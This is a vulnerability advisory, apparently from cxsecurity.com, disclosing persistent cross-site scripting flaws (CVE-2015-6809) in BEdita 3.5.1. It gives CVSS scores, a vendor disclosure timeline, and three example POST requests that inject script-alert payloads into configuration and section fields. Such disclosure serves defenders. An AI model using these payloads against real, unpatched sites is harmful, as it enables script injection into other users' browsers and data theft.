Bedita 3.5.1 XSS vulnerabilites

2015-09-02 / 2015-10-25
Credit: Bedita
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2015-6809
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

######################################################################################## # Title: Bedita 3.5.1 XSS vulnerabilites # Application: Bedita # Version: 3.5.1 # Software Link: http://www.bedita.com/ # Date: 2015-03-09 # Author: Sébastien Morin # Contact: https://twitter.com/SebMorin1 # Category: Web Applications ######################################################################################## =================== Introduction: =================== BEdita is an open source web development framework that features a Content Management System (CMS) out-of-the-box. BEdita is built upon the PHP development framework CakePHP. (http://en.wikipedia.org/wiki/BEdita) ######################################################################################## =================== Report Timeline: =================== 2015-03-09 Vulnerabilities reported to vendor 2015-03-10 Vendor reponse 2015-03-11 Vendor confirmed 2015-08-31 Vendor releases version 3.6 2015-08-31 Advisory Release ######################################################################################## =================== Technical details: =================== Persistent XSS: =============== Bedita 3.5.1 contains multiples flaws that allows a persistent remote cross site scripting attack in the "cfg[projectName]", "data[stats_provider_url]" and "data[description]" parameters. This could allow malicious users to create a specially crafted POST request that would execute arbitrary code in a user's browser in order to gather data from them or to modify the content of the page presented to the user. Exploits Examples: 1)cfg[projectName] parameter: POST http://127.0.0.1/bedita/index.php/admin/saveConfig Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/bedita/index.php/admin/viewConfig Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6 Connection: keep-alive [...]cfg%5BprojectName%5D=<script>alert(12345)</script>[...] 2) data[stats_provider_url] parameter: POST http://127.0.0.1/bedita/index.php/areas/saveArea Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/bedita/index.php/areas/saveArea Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6 Connection: keep-alive [...]data%5Bstats_provider_url%5D="><script>alert(12345)</script>[...] 3) data[description] parameter: POST http://127.0.0.1/bedita/index.php/areas/saveSection Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/bedita/index.php/areas/saveSection Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6 Connection: keep-alive [...]data%5Bdescription%5D=&lt;/textarea&gt;<script>alert(123)</script>[...] ########################################################################################

References:

https://twitter.com/SebMorin1


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top